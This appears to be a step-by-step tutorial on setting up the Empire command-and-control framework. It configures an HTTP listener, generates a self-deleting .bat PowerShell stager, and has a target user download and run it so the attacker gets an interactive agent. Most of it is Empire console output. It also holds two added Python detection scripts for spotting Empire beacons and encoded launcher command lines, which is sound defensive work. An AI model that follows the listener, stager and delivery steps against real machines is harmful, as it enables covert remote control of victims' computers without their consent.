1. Environment
Kali Linux, Windows 2008, the Empire toolkit
2. Installing Empire
Search for Empire on GitHub, find the matching repository link, and copy the link to Kali to clone it.
Next install Empire: change into the Empire/setup directory, run ./install.sh, and wait for the installation to finish.
3. Configuring a listener
Start Empire with the command ./empire
View / create a listener:
(Empire) > listeners

[*] Active listeners:

  Name  Module  Host                  Delay/Jitter  KillDate
  ----  ------  ----                  ------------  --------
  hack  http    http://kali[ip]:8080  5/0.0

(Empire: listeners) >
First remove all previously created listeners and agents:
(Empire: listeners) > kill all
[>] Kill all listeners? [y/N] y

(Empire: agents) > remove all
[>] Remove all agents from the database? [y/N] y
[*] Agent % deleted
(Empire: agents) >
Use the http listener:
(Empire: listeners) > uselistener
dbx   http_com      http_hop   meterpreter  redirector
http  http_foreign  http_mapi  onedrive
(Empire: listeners) > uselistener http
(Empire: listeners/http) >
View the configuration with info:
(Empire: listeners/http) > info

    Name: HTTP[S]
Category: client_server

Authors: @harmj0y

Description:
  Starts a http[s] listener (PowerShell or Python) that uses a GET/POST approach.

HTTP[S] Options:

  Name              Required  Value                             Description
  ----              --------  -------                           -----------
  SlackToken        False                                       Your SlackBot API token to communicate with your Slack instance.
  ProxyCreds        False     default                           Proxy credentials ([domain\]username:password) to use for request (default, none, or other).
  KillDate          False                                       Date for the listener to exit (MM/dd/yyyy).
  Name              True      hack                              Name for the listener.
  Launcher          True      powershell -noP -sta -w 1 -enc    Launcher string.
  DefaultDelay      True      5                                 Agent delay/reach back interval (in seconds).
  DefaultLostLimit  True      60                                Number of missed checkins before exiting
  WorkingHours      False                                       Hours for the agent to operate (09:00-17:00).
  SlackChannel      False     #general                          The Slack channel or DM that notifications will be sent to.
  DefaultProfile    True      /admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                Default communication profile for the agent.
  Host              True      http://kali[ip]:8080              Hostname/IP for staging.
  CertPath          False                                       Certificate path for https listeners.
  DefaultJitter     True      0.0                               Jitter in agent reachback interval (0.0-1.0).
  Proxy             False     default                           Proxy to use for request (default, none, or other).
  UserAgent         False     default                           User-agent string to use for the staging request (default, none, or other).
  StagingKey        True      n/Q~uC?0_&l4fd2Z}XKa<Lt:FOoG[^5k  Staging key for initial agent negotiation.
  BindIP            True      0.0.0.0                           The IP to bind to on the control server.
  Port              True      8080                              Port for the listener.
  ServerVersion     True      Microsoft-IIS/7.5                 Server header for the control server.
  StagerURI         False                                       URI for the stager. Must use /download/. Example: /download/stager.php
As in msf, use set to configure the Host and port:
(Empire: listeners/http) > set Port 8080
(Empire: listeners/http) > set Host kali[ip]:8080
(Empire: listeners/http) > set Name hack
Start the listener:
(Empire: listeners/http) > execute
[*] Starting listener 'hack1'
* Serving Flask app "http" (lazy loading)
* Environment: production
WARNING: Do not use the development server in a production environment.
Use a production WSGI server instead.
* Debug mode: off
[+] Listener successfully started!
(Empire: listeners/http) >
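The info listing above exposes what a defender can key on: the DefaultProfile option (the check-in URIs and the User-Agent the agent presents), the ServerVersion header the control server returns, and the fixed DefaultDelay of 5 seconds with DefaultJitter 0.0. The following Python is an added example written for this page, not Empire's own code: it parses a constructed, hypothetical proxy log format, matches requests against those default profile values, and flags a client whose matching requests recur at the configured interval. The log format, the sample log lines and the client addresses are all invented for the example.

```python
import re
import statistics
from collections import defaultdict
from datetime import datetime

# Values copied from the listener's `info` output: the DefaultProfile option
# ("uri1,uri2,...|User-Agent"), the ServerVersion header and DefaultDelay.
DEFAULT_PROFILE = ("/admin/get.php,/news.php,/login/process.php"
                   "|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko")
DEFAULT_SERVER_HEADER = "Microsoft-IIS/7.5"
DEFAULT_DELAY = 5  # seconds; DefaultJitter is 0.0 in the walkthrough, so check-ins are regular


def parse_profile(profile):
    """Split an Empire-style 'uri1,uri2|User-Agent' profile into (set of URIs, user-agent)."""
    uris, ua = profile.split("|", 1)
    return {u.strip() for u in uris.split(",")}, ua.strip()


PROFILE_URIS, PROFILE_UA = parse_profile(DEFAULT_PROFILE)

# Hypothetical proxy log format, constructed for this example:
#   <ISO-8601 timestamp> <client> <method> <uri> "<user-agent>" <server-header>
LOG_RE = re.compile(
    r'^(?P<ts>\S+) (?P<src>\S+) (?P<method>[A-Z]+) (?P<uri>\S+) "(?P<ua>[^"]*)" (?P<server>\S+)$'
)


def parse_line(line):
    """Parse one log line into a dict, or return None for lines in another format."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.fromisoformat(rec["ts"].replace("Z", "+00:00"))
    return rec


def indicators(rec):
    """Static indicators for one request: which default-profile values it reproduces."""
    hits = []
    if rec["uri"] in PROFILE_URIS:
        hits.append("uri")
    if rec["ua"] == PROFILE_UA:
        hits.append("user-agent")
    if rec["server"] == DEFAULT_SERVER_HEADER:
        hits.append("server-header")
    return hits


def find_beacons(lines, expected_delay=DEFAULT_DELAY, tolerance=1.0, min_requests=4):
    """Group profile-matching requests per client and flag clients that check in at a fixed interval."""
    by_src = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        hits = indicators(rec)
        # Require both the URI and the User-Agent to match before counting the request.
        if "uri" in hits and "user-agent" in hits:
            by_src[rec["src"]].append((rec["ts"], hits))
    findings = {}
    for src, reqs in by_src.items():
        if len(reqs) < min_requests:
            continue
        reqs.sort(key=lambda r: r[0])
        gaps = [(b[0] - a[0]).total_seconds() for a, b in zip(reqs, reqs[1:])]
        median = statistics.median(gaps)
        spread = statistics.pstdev(gaps)
        if abs(median - expected_delay) <= tolerance and spread <= tolerance:
            findings[src] = {
                "requests": len(reqs),
                "median_interval_s": median,
                "indicators": sorted({h for _, hits in reqs for h in hits}),
            }
    return findings


# Constructed sample log: 10.0.0.5 checks in every 5 s against the default profile,
# 10.0.0.9 is ordinary browsing with a different user-agent.
SAMPLE_LOG = [
    '2024-01-01T10:00:00Z 10.0.0.5 GET /admin/get.php "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" Microsoft-IIS/7.5',
    '2024-01-01T10:00:02Z 10.0.0.9 GET /index.html "Mozilla/5.0 (X11; Linux x86_64) Chrome/120.0" nginx/1.24.0',
    '2024-01-01T10:00:05Z 10.0.0.5 GET /news.php "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" Microsoft-IIS/7.5',
    '2024-01-01T10:00:10Z 10.0.0.5 GET /login/process.php "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" Microsoft-IIS/7.5',
    '2024-01-01T10:00:15Z 10.0.0.5 POST /admin/get.php "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" Microsoft-IIS/7.5',
    '2024-01-01T10:00:20Z 10.0.0.5 GET /news.php "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" Microsoft-IIS/7.5',
    '2024-01-01T10:00:30Z 10.0.0.9 GET /news.php "Mozilla/5.0 (X11; Linux x86_64) Chrome/120.0" nginx/1.24.0',
]

if __name__ == "__main__":
    for src, info in find_beacons(SAMPLE_LOG).items():
        print(src, info)
```

Only the default profile is matched here; an operator who changes DefaultProfile, ServerVersion or DefaultJitter defeats the static checks, which is why the interval test on the client's own request timing is kept as a separate signal.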
4. Generating the backdoor file
Use usestager to generate the backdoor, then have the target machine download and execute it; Windows and Linux are supported.
(Empire: listeners/http) > back
(Empire: listeners) > usestager
multi/bash         osx/dylib            windows/backdoorLnkMacro  windows/launcher_sct
multi/launcher     osx/jar              windows/bunny             windows/launcher_vbs
multi/macro        osx/launcher         windows/csharp_exe        windows/launcher_xml
multi/pyinstaller  osx/macho            windows/dll               windows/macro
multi/war          osx/macro            windows/ducky             windows/macroless_msword
osx/applescript    osx/pkg              windows/hta               windows/shellcode
osx/application    osx/safari_launcher  windows/launcher_bat      windows/teensy
osx/ducky          osx/teensy           windows/launcher_lnk
(Empire: listeners) > usestager windows/launcher_bat
(Empire: stager/windows/launcher_bat) > info
Check the configuration. Here the Listener option must be set, and its value must be exactly the listener's name!
(Empire: stager/windows/launcher_bat) > info

Name: BAT Launcher

Description:
  Generates a self-deleting .bat launcher for Empire.

Options:

  Name              Required  Value                                Description
  ----              --------  -------                              -----------
  Listener          True                                           Listener to generate stager for.
  OutFile           False     /tmp/launcher.bat                    File to output .bat launcher to, otherwise displayed on the screen.
  Obfuscate         False     False                                Switch. Obfuscate the launcher powershell code, uses the ObfuscateCommand for obfuscation types. For powershell only.
  ObfuscateCommand  False     Token\All\1,Launcher\STDIN++\12467   The Invoke-Obfuscation command to use. Only used if Obfuscate switch is True. For powershell only.
  Language          True      powershell                           Language of the stager to generate.
  ProxyCreds        False     default                              Proxy credentials ([domain\]username:password) to use for request (default, none, or other).
  UserAgent         False     default                              User-agent string to use for the staging request (default, none, or other).
  Proxy             False     default                              Proxy to use for request (default, none, or other).
  Delete            False     True                                 Switch. Delete .bat after running.
  StagerRetries     False     0                                    Times for the stager to retry connecting.

(Empire: stager/windows/launcher_bat) > set Listener hack1
(Empire: stager/windows/launcher_bat) > info

Name: BAT Launcher

Description:
  Generates a self-deleting .bat launcher for Empire.

Options:

  Name              Required  Value                                Description
  ----              --------  -------                              -----------
  Listener          True      hack1                                Listener to generate stager for.
  OutFile           False     /tmp/launcher.bat                    File to output .bat launcher to, otherwise displayed on the screen.
  Obfuscate         False     False                                Switch. Obfuscate the launcher powershell code, uses the ObfuscateCommand for obfuscation types. For powershell only.
  ObfuscateCommand  False     Token\All\1,Launcher\STDIN++\12467   The Invoke-Obfuscation command to use. Only used if Obfuscate switch is True. For powershell only.
  Language          True      powershell                           Language of the stager to generate.
  ProxyCreds        False     default                              Proxy credentials ([domain\]username:password) to use for request (default, none, or other).
  UserAgent         False     default                              User-agent string to use for the staging request (default, none, or other).
  Proxy             False     default                              Proxy to use for request (default, none, or other).
  Delete            False     True                                 Switch. Delete .bat after running.
  StagerRetries     False     0                                    Times for the stager to retry connecting.

(Empire: stager/windows/launcher_bat) >
Then run execute; the backdoor file is written to the /tmp directory:
(Empire: stager/windows/launcher_bat) > execute

[*] Stager output written out to: /tmp/launcher.bat

(Empire: stager/windows/launcher_bat) >
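The stager generated here wraps the listener's Launcher string, powershell -noP -sta -w 1 -enc followed by a base64 payload, which is a common triage target in process-creation logs. The Python below is an added example for this page, not Empire's code: it resolves the abbreviated PowerShell switches (PowerShell accepts unambiguous prefixes, so -noP is -NoProfile, -w 1 is -WindowStyle Hidden and -enc is -EncodedCommand), decodes the UTF-16LE base64 argument so an analyst can read it, and marks a command line as launcher-like when a hidden window and an encoded command occur together. The sample command lines and the encoded payload are constructed for the example; the payload is a harmless Write-Output string, not a real stager.

```python
import base64
import re

# Full PowerShell switch names, in the order used for prefix resolution. PowerShell itself
# rejects ambiguous prefixes; this simplified resolver takes the first match.
FULL_NAMES = ["noprofile", "noninteractive", "nologo", "sta", "windowstyle",
              "encodedcommand", "executionpolicy", "command", "file"]
ALIASES = {"e": "encodedcommand", "ec": "encodedcommand", "ep": "executionpolicy"}
VALUE_SWITCHES = {"windowstyle", "encodedcommand", "executionpolicy", "command", "file"}


def resolve_switch(token):
    """Map a (possibly abbreviated) PowerShell switch to its full name; None for non-switches."""
    if len(token) < 2 or token[0] not in "-/":
        return None
    short = token[1:].lower()
    if short in ALIASES:
        return ALIASES[short]
    return next((name for name in FULL_NAMES if name.startswith(short)), None)


def decode_encoded_command(b64):
    """Decode a -EncodedCommand argument (base64 of UTF-16LE text); None if it is not one."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse_command_line(cmdline):
    """Return a finding for a PowerShell command line, or None if the image is not PowerShell."""
    argv = cmdline.split()  # whitespace split is enough for the launcher shape discussed here
    if not argv or not re.search(r"(^|[\\/])(powershell|pwsh)(\.exe)?$", argv[0], re.IGNORECASE):
        return None
    finding = {"switches": [], "profile_skipped": False, "hidden_window": False, "decoded": None}
    i = 1
    while i < len(argv):
        name = resolve_switch(argv[i])
        takes_value = name in VALUE_SWITCHES and i + 1 < len(argv)
        value = argv[i + 1] if takes_value else None
        if name:
            finding["switches"].append(name)
        if name == "noprofile":
            finding["profile_skipped"] = True
        # ProcessWindowStyle value 1 is Hidden, so "-w 1" and "-w hidden" are equivalent.
        if name == "windowstyle" and value is not None and value.lower() in ("1", "hidden"):
            finding["hidden_window"] = True
        if name == "encodedcommand" and value is not None:
            finding["decoded"] = decode_encoded_command(value)
        i += 2 if takes_value else 1
    finding["launcher_like"] = finding["hidden_window"] and finding["decoded"] is not None
    return finding


# Constructed samples: a launcher-shaped command line carrying a harmless encoded payload,
# and a benign scheduled script for comparison.
SAMPLE_PAYLOAD = "Write-Output 'constructed sample, not a real stager'"
SAMPLE_B64 = base64.b64encode(SAMPLE_PAYLOAD.encode("utf-16-le")).decode("ascii")
SAMPLE_CMDLINE = f"powershell -noP -sta -w 1 -enc {SAMPLE_B64}"
BENIGN_CMDLINE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoLogo -File C:\scripts\backup.ps1"

if __name__ == "__main__":
    for line in (SAMPLE_CMDLINE, BENIGN_CMDLINE):
        print(analyse_command_line(line))
```

The decoded text is what an analyst would read and hash; the two-signal rule (hidden window plus encoded command) keeps ordinary -File or -Command invocations with a visible window out of the alert queue, while -NoProfile is recorded as supporting context rather than a trigger on its own.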
Upload the backdoor file to the web directory and have the target user visit, download and execute it.
Once the target has run it, a shell connection is obtained.
Enter agents to see the agent that called back.
Connect to it:
(Empire: agents) > interact 8R4AD1NC
(Empire: 8R4AD1NC) >
Attack complete.